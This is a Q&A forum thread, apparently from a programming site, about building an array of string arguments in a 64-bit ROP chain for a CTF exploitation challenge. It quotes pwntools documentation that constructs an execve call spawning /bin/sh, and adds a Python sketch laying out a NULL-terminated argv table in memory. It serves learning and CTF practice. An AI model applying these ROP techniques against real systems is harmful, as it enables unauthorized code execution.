Create array with ROP chain (64-bit)?


In order to solve a binary exploitation CTF-Challenge I have to create an array of arguments to pass to a syscall. I searched a lot on the internet, but I can't find a description of how to create an array of strings with a ROP-Chain on a 64-bit machine.

Does anyone know how it's done?


There are 1 best solutions below


If you supply the stack address, it will be automatically done using pwntools ROP functionality.

Excerpt from the docs:

You can also append complex arguments onto stack when the stack pointer is known.

>>> rop = ROP(binary, base=0x7fffe000)
>>> rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls']], 0])
>>> print(rop.dump())
0x7fffe000:       0xcafebabe execve([b'/bin/sh'], [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls']], 0)
0x7fffe004:          b'baaa' <return address>
0x7fffe008:       0x7fffe014 arg0 (+0xc)
0x7fffe00c:       0x7fffe01c arg1 (+0x10)
0x7fffe010:              0x0 arg2
0x7fffe014:   b'/bin/sh\x00'
0x7fffe01c:       0x7fffe02c (+0x10)
0x7fffe020:       0x7fffe034 (+0x14)
0x7fffe024:       0x7fffe038 (+0x14)
0x7fffe028:       0x7fffe03c (+0x14)
0x7fffe02c:   b'/bin/sh\x00'
0x7fffe034:       b'-p\x00$'
0x7fffe038:       b'-c\x00$'
0x7fffe03c:       b'ls\x00$'
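
The excerpt above shows 4-byte slots; the following is an added example, not part of the answer or of pwntools, that lays out the same strings as a `char *argv[]` with 8-byte pointers at a known base address and then walks the table back to check it. The names `layout_argv` and `read_argv` are hypothetical, and the NUL padding and the terminating NULL pointer (which `execve` requires of `argv`) are choices of this sketch.

```python
import struct

def layout_argv(base, args, word=8):
    """Lay out a NULL-terminated char* array at `base`; return (blob, pointers)."""
    fmt = "<Q" if word == 8 else "<I"           # little-endian pointer slots
    cursor = base + (len(args) + 1) * word      # strings follow the pointer table
    pointers, strings = [], b""
    for arg in args:
        data = arg + b"\x00"
        data += b"\x00" * (-len(data) % word)   # keep each string word-aligned
        pointers.append(cursor)
        strings += data
        cursor += len(data)
    pointers.append(0)                          # terminating NULL pointer
    return b"".join(struct.pack(fmt, p) for p in pointers) + strings, pointers

def read_argv(blob, base, word=8):
    """Follow the pointer table back to the strings, stopping at NULL."""
    fmt = "<Q" if word == 8 else "<I"
    out = []
    for off in range(0, len(blob) - word + 1, word):
        (ptr,) = struct.unpack_from(fmt, blob, off)
        if ptr == 0:
            return out
        start = ptr - base
        if not 0 <= start < len(blob):
            raise ValueError(f"pointer {ptr:#x} falls outside the blob")
        out.append(blob[start:blob.index(b"\x00", start)])
    raise ValueError("pointer table is not NULL-terminated")

if __name__ == "__main__":
    base = 0x7fffe000                           # same base as the excerpt
    args = [b"/bin/sh", b"-p", b"-c", b"ls"]
    blob, pointers = layout_argv(base, args)
    for i, p in enumerate(pointers):
        print(f"{base + 8 * i:#x}: {p:#018x}")
    print(read_argv(blob, base))
```

Every pointer is computed from `base`, which is why the address the data will occupy has to be known before the layout is built.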